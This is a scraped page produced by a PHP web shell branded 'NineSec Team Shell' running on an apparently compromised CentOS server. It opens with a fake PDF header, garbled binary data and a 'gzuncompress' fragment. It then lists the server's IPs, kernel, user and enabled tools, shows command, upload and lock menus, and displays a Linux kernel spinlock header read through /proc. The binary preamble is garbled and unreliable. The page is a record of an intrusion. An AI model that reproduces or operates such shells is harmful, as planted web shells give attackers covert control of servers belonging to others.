%PDF-1.3 %âãÏÓ 1 0 obj<> endobj 2 0 obj<> endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream xœ¥\mo7þ ÿa?îâñH£ÑÌàŠyi{¹$EÚ(i?¬cÇÞÄkûürAþý‰½Žv·EÛízF¢HI|H‘Ô?¿{Ø|Z|X|÷Ýñó‡‡õÇËó³Å‡ã77Û?O¾Ýž¿__l®×››ëãßOàя77çwß¿xñêåâÅÉÓ'Ç?ªÅ°8ùôôI] µûgQ»ÔB©¦2zaà³]œlÝûÅ|üôôɇåÛ՟‹“?}òƒ£ " L* & J * j .  N (8HXhx )9IYiy *:JZjz +;K[k{ , C> r. ^ ~ N @ qO!  ` ( S A  a=  ! wQ It Ba @l q T  f !U* A 9%n o M - 5J  w@O|l:Bg y= B=jq K - jM 4EP N q f ^ u> $k ( H l EW o W  %l d] 6 ] - L  > 9 t* y 4 b 5 Q\ \ v U  2c 3  c qM = |  IT: S |{; ^| e]/ n3g _ > t! y {  Zm \{o]'S ~ VN a w - u x* " 3 }$jH q w bx B" < 5b }% + 09_h>G u7$ y MJ$ Y&X z (r ` [N _pny!lu o x `N d z Oy O.* r  _s iQ  BRx .) _6jV ] # W RVy k~ cI Y H  dsR  rZ+ )f d v* ' i G j * cB zi  _  j z[ 7; 2 -  zZ  f V z9 JR n  72 81 [e n &ci ( r  U q _+q rV 3  " > ;1 0x >{ |` r h W q f 3 l ]u b-5 Fwm z zp)M ) jO q u q  E K l 7  [[ y Xg e ~ , 9  k; +ny  )s=9) u_l " Z ; x =. M= +? ^  q $ .[ i [ Fj y Ux { >_ xH  > ; 8 < w/l hy  9o <: 'f4 |   w e  G G * !# b` B,  $*q Ll   (Jq T r ,jq \   0 q d,  4 q ll   8 q t  < q |   @ r , ! D*r l # HJr %/ Ljr '? P r , ) Q; gzuncompress NineSec Team Shell
NineSec Team Shell
Server IP : 10.0.3.46  /  Your IP : 172.69.7.43
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
System : Linux ukmjuara 3.10.0-1160.95.1.el7.x86_64 #1 SMP Mon Jul 24 13:59:37 UTC 2023 x86_64
User : apache ( 48)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON
Directory (0755) :  /proc/16354/root/lib/modules/3.10.0-957.5.1.el7.x86_64/source/include/asm-generic/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : //proc/16354/root/lib/modules/3.10.0-957.5.1.el7.x86_64/source/include/asm-generic/qspinlock.h
/*
 * Queued spinlock
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * (C) Copyright 2013-2015 Hewlett-Packard Development Company, L.P.
 *
 * Authors: Waiman Long <waiman.long@hp.com>
 */
#ifndef __ASM_GENERIC_QSPINLOCK_H
#define __ASM_GENERIC_QSPINLOCK_H

#include <asm-generic/qspinlock_types.h>

/**
 * queued_spin_unlock_wait - wait until the _current_ lock holder releases the lock
 * @lock : Pointer to queued spinlock structure
 *
 * There is a very slight possibility of live-lock if the lockers keep coming
 * and the waiter is just unfortunate enough to not see any unlock state.
 */
#ifndef queued_spin_unlock_wait
extern void queued_spin_unlock_wait(struct qspinlock *lock);
#endif

/**
 * queued_spin_is_locked - is the spinlock locked?
 * @lock: Pointer to queued spinlock structure
 * Return: 1 if it is locked, 0 otherwise
 */
#ifndef queued_spin_is_locked
static __always_inline int queued_spin_is_locked(struct qspinlock *lock)
{
	/*
	 * See queued_spin_unlock_wait().
	 *
	 * Any !0 state indicates it is locked, even if _Q_LOCKED_VAL
	 * isn't immediately observable.
	 */
	return atomic_read(&lock->val);
}
#endif

/**
 * queued_spin_value_unlocked - is the spinlock structure unlocked?
 * @lock: queued spinlock structure
 * Return: 1 if it is unlocked, 0 otherwise
 *
 * N.B. Whenever there are tasks waiting for the lock, it is considered
 *      locked wrt the lockref code to avoid lock stealing by the lockref
 *      code and change things underneath the lock. This also allows some
 *      optimizations to be applied without conflict with lockref.
 */
static __always_inline int queued_spin_value_unlocked(struct qspinlock lock)
{
	return !atomic_read(&lock.val);
}

/**
 * queued_spin_is_contended - check if the lock is contended
 * @lock : Pointer to queued spinlock structure
 * Return: 1 if lock contended, 0 otherwise
 */
static __always_inline int queued_spin_is_contended(struct qspinlock *lock)
{
	return atomic_read(&lock->val) & ~_Q_LOCKED_MASK;
}
/**
 * queued_spin_trylock - try to acquire the queued spinlock
 * @lock : Pointer to queued spinlock structure
 * Return: 1 if lock acquired, 0 if failed
 */
static __always_inline int queued_spin_trylock(struct qspinlock *lock)
{
	int val = atomic_read(&lock->val);

	if ((!val || (val == _Q_UNLOCKED_VAL)) &&
	   (atomic_cmpxchg(&lock->val, val, _Q_LOCKED_VAL) == val))
		return 1;
	return 0;
}

extern void queued_spin_lock_slowpath(struct qspinlock *lock, u32 val);

/**
 * queued_spin_lock - acquire a queued spinlock
 * @lock: Pointer to queued spinlock structure
 */
static __always_inline void queued_spin_lock(struct qspinlock *lock)
{
	u32 val;

	val = atomic_cmpxchg(&lock->val, 0, _Q_LOCKED_VAL);
	if (likely(val == 0))
		return;
	queued_spin_lock_slowpath(lock, val);
}

#ifndef queued_spin_unlock
/**
 * queued_spin_unlock - release a queued spinlock
 * @lock : Pointer to queued spinlock structure
 */
static __always_inline void queued_spin_unlock(struct qspinlock *lock)
{
	/*
	 * smp_mb__before_atomic() in order to guarantee release semantics
	 */
	smp_mb__before_atomic_dec();
	atomic_sub(_Q_LOCKED_VAL, &lock->val);
}
#endif

#ifndef virt_spin_lock
static __always_inline bool virt_spin_lock(struct qspinlock *lock)
{
	return false;
}
#endif

/*
 * Remapping spinlock architecture specific functions to the corresponding
 * queued spinlock functions.
 */
#define arch_spin_is_locked(l)		queued_spin_is_locked(l)
#define arch_spin_is_contended(l)	queued_spin_is_contended(l)
#define arch_spin_value_unlocked(l)	queued_spin_value_unlocked(l)
#define arch_spin_lock(l)		queued_spin_lock(l)
#define arch_spin_trylock(l)		queued_spin_trylock(l)
#define arch_spin_unlock(l)		queued_spin_unlock(l)
#define arch_spin_lock_flags(l, f)	queued_spin_lock(l)
#define arch_spin_unlock_wait(l)	queued_spin_unlock_wait(l)

#endif /* __ASM_GENERIC_QSPINLOCK_H */

NineSec Team - 2022